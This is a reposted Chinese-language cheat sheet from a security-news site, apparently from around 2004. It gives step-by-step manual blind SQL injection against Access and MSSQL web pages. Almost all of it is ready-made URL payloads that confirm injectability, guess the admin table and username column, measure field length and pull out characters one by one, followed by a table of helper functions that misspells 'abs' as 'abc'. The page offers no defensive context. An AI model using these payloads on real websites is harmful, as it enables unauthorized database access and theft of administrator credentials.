- 首页 > 资讯 > 网站安全 > 正文
手工检测可否注入
- 04-11-09
来源:[db:作者]
-
收藏
我要投稿
=============================================================================
□ 检测可否注入
==============================================================================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)
==============================================================================
□ 检测表段的
==============================================================================
http://url/xx?id=1111 and exists (select * from admin)
==============================================================================
□ 检测字段的
==============================================================================
http://url/xx?id=1111 and exists (select username from admin)
==============================================================================
□ 检测ID
==============================================================================
http://url/xx?id=1111 and exists (select id from admin where ID=1)
==============================================================================
□ 检测长度的
==============================================================================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
==============================================================================
□ 检测长度的
==============================================================================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
==============================================================================
□ 检测是否为MSSQL数据库
==============================================================================
http://url/xx?id=1111 and exists (select * from sysobjects)
==============================================================================
□ 检测是否为英文
==============================================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
==============================================================================
□ 检测英文的范围
==============================================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
==============================================================================
□ 检测那个字符
==============================================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
===============================================================================
常用函数
===============================================================================
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
=======================================================================
newsid=291&classid=12 and 1=1
newsid=291 and 1=1&classid=12
=====================
NBSI没出来之前的收藏了。
相关TAG标签
- 上一篇:这个免费网络“U盘”,就是有点“不一般”
- 下一篇:老话再谈 教你怎么用瑞士军刀